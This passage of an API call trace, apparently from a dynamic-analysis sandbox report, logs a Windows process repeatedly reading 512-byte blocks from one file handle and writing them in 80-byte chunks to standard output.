0x4c [0150.855] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] GetFileType (hFile=0x4c) returned 0x1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] GetFileType (hFile=0x4c) returned 0x1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.855] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.855] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] GetFileType (hFile=0x4c) returned 0x1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] GetFileType (hFile=0x4c) returned 0x1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] GetFileType (hFile=0x4c) returned 0x1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] GetFileType (hFile=0x4c) returned 0x1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] GetFileType 
(hFile=0x4c) returned 0x1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] GetFileType (hFile=0x4c) returned 0x1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] GetFileType (hFile=0x4c) returned 0x1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] GetFileType (hFile=0x4c) returned 0x1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.857] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.857] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.857] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.857] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.857] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] GetFileType (hFile=0x4c) returned 0x1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] GetFileType (hFile=0x4c) returned 0x1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] GetFileType (hFile=0x4c) returned 0x1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] GetFileType (hFile=0x4c) returned 0x1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] GetFileType (hFile=0x4c) returned 0x1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] GetFileType (hFile=0x4c) returned 0x1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, 
lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] GetFileType (hFile=0x4c) returned 0x1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] GetFileType (hFile=0x4c) returned 0x1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.858] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.858] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.858] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.858] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] GetFileType (hFile=0x4c) returned 0x1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] GetFileType (hFile=0x4c) returned 0x1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] GetFileType (hFile=0x4c) returned 0x1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0150.858] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] GetFileType (hFile=0x4c) returned 0x1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] GetFileType (hFile=0x4c) returned 0x1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] GetFileType (hFile=0x4c) returned 0x1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] GetFileType (hFile=0x4c) returned 0x1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] GetFileType (hFile=0x4c) returned 0x1 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.859] WriteFile (in: hFile=0x4c, 
lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.859] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.859] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.859] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.859] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] GetFileType (hFile=0x4c) returned 0x1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] GetFileType (hFile=0x4c) returned 0x1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] GetFileType (hFile=0x4c) returned 0x1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] GetFileType (hFile=0x4c) returned 0x1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.860] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0150.860] GetFileType (hFile=0x4c) returned 0x1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] GetFileType (hFile=0x4c) returned 0x1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.860] GetFileType (hFile=0x4c) returned 0x1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] GetFileType (hFile=0x4c) returned 0x1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.861] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.861] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.861] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.861] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, 
lpOverlapped=0x0) returned 1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] GetFileType (hFile=0x4c) returned 0x1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] GetFileType (hFile=0x4c) returned 0x1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] GetFileType (hFile=0x4c) returned 0x1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.861] GetFileType (hFile=0x4c) returned 0x1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] GetFileType (hFile=0x4c) returned 0x1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] GetFileType (hFile=0x4c) returned 0x1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 
| out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] GetFileType (hFile=0x4c) returned 0x1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] GetFileType (hFile=0x4c) returned 0x1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.862] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.862] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.862] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.862] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] GetFileType (hFile=0x4c) returned 0x1 [0150.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.862] GetFileType (hFile=0x4c) returned 0x1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] GetFileType (hFile=0x4c) returned 0x1 [0150.863] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0150.863] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] GetFileType (hFile=0x4c) returned 0x1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] GetFileType (hFile=0x4c) returned 0x1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] GetFileType (hFile=0x4c) returned 0x1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] GetFileType (hFile=0x4c) returned 0x1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.863] GetFileType (hFile=0x4c) returned 0x1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0150.864] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.864] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.864] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.864] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.864] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] GetFileType (hFile=0x4c) returned 0x1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] GetFileType (hFile=0x4c) returned 0x1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] GetFileType (hFile=0x4c) returned 0x1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] GetFileType (hFile=0x4c) returned 0x1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 
[0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] GetFileType (hFile=0x4c) returned 0x1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.864] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] GetFileType (hFile=0x4c) returned 0x1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] GetFileType (hFile=0x4c) returned 0x1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] GetFileType (hFile=0x4c) returned 0x1 [0150.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.865] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.865] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.865] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: 